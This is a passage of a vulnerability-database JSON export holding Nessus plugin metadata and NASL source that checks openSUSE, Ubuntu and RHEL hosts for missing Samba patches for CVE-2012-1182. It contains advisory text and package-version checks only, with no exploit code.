Remote attackers could exploit that to execute arbitrary code as root (CVE-2012-1182, bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the samba-doc package or the package change log (rpm -q --changelog samba) for more details of the version update.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ldapsmb", "p-cpe:/a:novell:opensuse:libldb-devel", "p-cpe:/a:novell:opensuse:libldb1", "p-cpe:/a:novell:opensuse:libldb1-32bit", "p-cpe:/a:novell:opensuse:libldb1-debuginfo", "p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbsharemodes-devel", "p-cpe:/a:novell:opensuse:libsmbsharemodes0", "p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc-devel", "p-cpe:/a:novell:opensuse:libtalloc2", "p-cpe:/a:novell:opensuse:libtalloc2-32bit", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtdb-devel", "p-cpe:/a:novell:opensuse:libtdb1", "p-cpe:/a:novell:opensuse:libtdb1-32bit", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtevent-devel", "p-cpe:/a:novell:opensuse:libtevent0", "p-cpe:/a:novell:opensuse:libtevent0-32bit", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo", 
"p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-devel", "p-cpe:/a:novell:opensuse:samba-krb-printing", "p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "cpe:/o:novell:opensuse:11.4"], "id": "OPENSUSE-2012-224.NASL", "href": "https://www.tenable.com/plugins/nessus/74601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-224.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74601);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)\");\n script_summary(english:\"Check for the openSUSE-2012-224 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-04/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ldapsmb-1.34b-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb-devel-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-debuginfo-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"libsmbsharemodes0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc-devel-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-debuginfo-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb-devel-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-debuginfo-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent-devel-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-debuginfo-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debugsource-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-debuginfo-3.6.3-112.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-debuginfo-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-debuginfo-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-debuginfo-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-debuginfo-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-3.6.3-112.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldapsmb / libldb-devel / libldb1 / libldb1-32bit / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:43", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when handling remote procedure calls (RPC) over the network. A remote, unauthenticated attacker could exploit this to execute arbitrary code as the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-13T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:samba", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1423-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58743", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1423-1. The text \n# itself is copyright (C) Canonical, Inc. 
See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58743);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"USN\", value:\"1423-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Brian Gorenc discovered that Samba incorrectly calculated array bounds\nwhen handling remote procedure calls (RPC) over the network. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code\nas the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1423-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"samba\", pkgver:\"3.0.28a-1ubuntu4.18\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"samba\", pkgver:\"2:3.4.7~dfsg-1ubuntu3.9\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"samba\", pkgver:\"2:3.5.8~dfsg-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"samba\", pkgver:\"2:3.5.11~dfsg-1ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:22", "description": "Updated samba4 packages that fix one security 
issue, multiple bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. As a result, code generated by the PIDL compiler might not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, interoperability with Active Directory (AD) domains is improved. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. 
For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages, which fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat Enterprise Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-02-21T00:00:00", "type": "nessus", "title": "RHEL 6 : samba4 (RHSA-2013:0506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba4", "p-cpe:/a:redhat:enterprise_linux:samba4-client", "p-cpe:/a:redhat:enterprise_linux:samba4-common", "p-cpe:/a:redhat:enterprise_linux:samba4-dc", "p-cpe:/a:redhat:enterprise_linux:samba4-dc-libs", "p-cpe:/a:redhat:enterprise_linux:samba4-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba4-devel", "p-cpe:/a:redhat:enterprise_linux:samba4-libs", "p-cpe:/a:redhat:enterprise_linux:samba4-pidl", "p-cpe:/a:redhat:enterprise_linux:samba4-python", "p-cpe:/a:redhat:enterprise_linux:samba4-swat", "p-cpe:/a:redhat:enterprise_linux:samba4-test", "p-cpe:/a:redhat:enterprise_linux:samba4-winbind", 
